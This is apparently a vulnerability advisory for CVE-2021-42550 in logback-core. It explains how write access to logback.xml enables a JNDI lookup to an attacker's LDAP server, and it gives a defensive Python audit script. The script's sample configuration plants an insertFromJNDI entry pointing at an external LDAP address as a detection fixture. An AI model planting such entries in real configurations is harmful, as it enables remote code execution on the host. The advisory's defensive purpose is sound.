CVE-2021-42550
Arbitrary code execution vulnerability in logback-core (Maven)

Impact: arbitrary code execution. Public exploits: none known.

What is CVE-2021-42550 About?

This vulnerability allows arbitrary code execution in Logback. The upstream advisory names versions 1.2.7 and earlier; the fixed release is 1.2.9, so the affected range is given below as <1.2.9. An attacker who already has the privileges needed to edit Logback's configuration files can craft a configuration entry that makes Logback perform a JNDI lookup against an attacker-controlled LDAP server and load code from it. Code obtained this way runs with the privileges of the JVM hosting the application, so a successful attack gives the attacker the same control over the system that the application has.

Affected Software

ch.qos.logback:logback-core <1.2.9

Technical Details

The vulnerability requires write access to the Logback configuration (typically logback.xml). Logback's configuration format can ask for JNDI lookups, for example through the <insertFromJNDI env-entry-name="..." as="..."/> element, which resolves a JNDI name and stores the result as a configuration variable. In affected versions the name is not restricted to the local java: namespace, so an attacker with write access can point it at an LDAP URL served by a host they control. This is the well-known JNDI injection pattern: the LDAP response can carry a JNDI Reference whose object factory is loaded from a remote codebase, or a serialized Java object that the client deserializes. In either case, reconstructing the returned object inside the application's JVM executes attacker-supplied code, with the privileges of that JVM.

What is the Impact of CVE-2021-42550?

Successful exploitation allows the attacker to execute arbitrary code with the privileges of the affected application, which can lead to full compromise of the host, theft of data the application can reach, and further movement into the network.

What is the Exploitability of CVE-2021-42550?

Exploitation requires the attacker to have, in the words of the upstream advisory, the "required privileges to edit configurations files", that is, write access to the Logback configuration. This normally means a prior compromise or administrative access: the attacker must already be able to change files on the system, which usually implies a high privilege level (an administrator or root account, or a service account that owns the application's deployment). The attack is therefore local in practice, and only becomes remote when a separate vulnerability gives the attacker remote file write. Two further caveats matter for triage. First, unlike Log4Shell (CVE-2021-44228), Logback does not perform lookups on logged message content, so untrusted input reaching the logger does not trigger this flaw; only the configuration does. Second, current JDKs (8u191, 11.0.1 and later) disable remote class loading from LDAP by default, so the remote-codebase variant of JNDI injection is blocked unless that default has been changed; the deserialization variant remains possible when a suitable gadget chain is present on the classpath. The need to modify configuration files is the main constraint and makes this considerably less straightforward than a typical remote code execution flaw.

What are the Known Public Exploits?

PoC | Author | Link | Commentary
No known exploits | - | - | -

What are the Available Fixes for CVE-2021-42550?

Available Upgrade Options

  • ch.qos.logback:logback-core
    • <1.2.9 → Upgrade to 1.2.9 or later

Logback 1.2.9 hardens the JNDI lookup performed from configuration so that only names in the java: namespace are honoured. Until the upgrade is deployed, restrict write access to the configuration files to the deployment owner and review them for insertFromJNDI entries that point outside java:.
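The following audit script is an added example, not code from this page or from the logback project. It performs the two checks the sections above call for: it resolves the logback-core version declared in a Maven pom.xml (including ${property} references) and compares it against the 1.2.9 fix, and it scans a logback.xml for insertFromJNDI entries whose env-entry-name lies outside the java: namespace, the entries the hardened lookup refuses. The sample pom.xml and logback.xml, the 203.0.113.10 address and the function names are constructed for the example; the insertFromJNDI element, its env-entry-name and as attributes, and the java: restriction are logback's own.

```python
"""Audit helpers for CVE-2021-42550 (logback-core JNDI lookup from configuration).

The sample pom.xml and logback.xml below are constructed for this example.
"""
import re
import xml.etree.ElementTree as ET

FIXED_VERSION = "1.2.9"          # fixed logback-core release per the advisory
LOGBACK_GROUP = "ch.qos.logback"
JNDI_JAVA_NAMESPACE = "java:"    # the only prefix the hardened lookup honours

_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(?:-([A-Za-z]*)(\d*))?$")


def parse_version(v):
    """Turn '1.2.9', '1.2', '1.3.0-alpha10' or '1.2.9-SNAPSHOT' into a sortable tuple.

    A bare release outranks any pre-release of the same number; pre-releases
    compare by qualifier name, then by numeric suffix (alpha9 < alpha10).
    """
    m = _VERSION_RE.match(v.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {v!r}")
    nums = tuple(int(p) for p in m.group(1).split("."))
    nums += (0,) * (3 - len(nums))            # 1.2 == 1.2.0
    if m.group(2) is None:                    # no '-qualifier' part
        return nums + (1, "", 0)
    return nums + (0, m.group(2).lower(), int(m.group(3) or 0))


def is_vulnerable(version):
    """True when a logback-core version is older than the fixed release."""
    return parse_version(version) < parse_version(FIXED_VERSION)


def _local(tag):
    """Strip the POM namespace: '{http://maven.apache.org/POM/4.0.0}version' -> 'version'."""
    return tag.rsplit("}", 1)[-1]


def _children(el):
    return {_local(c.tag): c for c in el}


def logback_dependencies(pom_xml):
    """Return [(artifactId, version)] for every ch.qos.logback dependency,
    resolving ${property} references against <properties> and ${project.version}."""
    root = ET.fromstring(pom_xml)
    props = {}
    for el in root.iter():
        if _local(el.tag) == "properties":
            props.update({_local(p.tag): (p.text or "").strip() for p in el})
    top = _children(root)
    if "version" in top:
        props.setdefault("project.version", (top["version"].text or "").strip())

    def resolve(s):
        return re.sub(r"\$\{([^}]+)\}", lambda m: props.get(m.group(1), m.group(0)), s)

    found = []
    for dep in root.iter():
        if _local(dep.tag) != "dependency":
            continue
        kids = _children(dep)
        group = kids.get("groupId")
        if group is None or (group.text or "").strip() != LOGBACK_GROUP:
            continue
        ver = kids.get("version")
        ver_text = resolve(ver.text.strip()) if ver is not None and ver.text else "(managed)"
        found.append(((kids["artifactId"].text or "").strip(), ver_text))
    return found


def vulnerable_logback_dependencies(pom_xml):
    """Logback dependencies below 1.2.9. A version inherited from a parent or BOM,
    or still containing an unresolved ${...}, is reported as 'unresolved' rather
    than silently skipped, so the reader knows to check the effective POM."""
    out = []
    for artifact, ver in logback_dependencies(pom_xml):
        if ver == "(managed)" or "${" in ver:
            out.append((artifact, ver, "unresolved"))
        elif is_vulnerable(ver):
            out.append((artifact, ver, "vulnerable"))
    return out


def jndi_entries_outside_java_namespace(logback_xml):
    """[(as, env-entry-name)] for each <insertFromJNDI> whose name is not in java:.
    These are the entries the 1.2.9 hardening refuses and the ones an attacker
    editing the file would add. <include> of other files is not followed here."""
    root = ET.fromstring(logback_xml)
    return [
        (el.get("as", ""), (el.get("env-entry-name") or "").strip())
        for el in root.iter("insertFromJNDI")
        if not (el.get("env-entry-name") or "").strip().startswith(JNDI_JAVA_NAMESPACE)
    ]


# Constructed sample inputs for this example.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.example</groupId><artifactId>demo</artifactId><version>1.0</version>
  <properties><logback.version>1.2.7</logback.version></properties>
  <dependencies>
    <dependency>
      <groupId>ch.qos.logback</groupId>
      <artifactId>logback-core</artifactId>
      <version>${logback.version}</version>
    </dependency>
  </dependencies>
</project>"""

SAMPLE_LOGBACK_XML = """<configuration>
  <insertFromJNDI env-entry-name="java:comp/env/appName" as="appName"/>
  <insertFromJNDI env-entry-name="ldap://203.0.113.10:1389/a" as="rogue"/>
  <root level="INFO"/>
</configuration>"""

if __name__ == "__main__":
    for artifact, ver, status in vulnerable_logback_dependencies(SAMPLE_POM):
        print(f"pom.xml: {artifact} {ver} -> {status}")
    for alias, name in jndi_entries_outside_java_namespace(SAMPLE_LOGBACK_XML):
        print(f"logback.xml: insertFromJNDI as={alias!r} env-entry-name={name!r} is outside java:")
```

The version comparison follows the page's range only (<1.2.9); logback's 1.3.0-alpha pre-releases are a separate line the page does not cover, and a 1.3.0-alphaN string compares as newer than 1.2.9 here. For real builds, run the check over the effective POM (mvn help:effective-pom) rather than a single pom.xml, and scan every file pulled in by <include> as well as the main configuration.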


Additional Resources

What are Similar Vulnerabilities to CVE-2021-42550?

Similar Vulnerabilities: CVE-2021-44228, CVE-2022-22965, CVE-2021-4104, CVE-2022-22950, CVE-2022-30190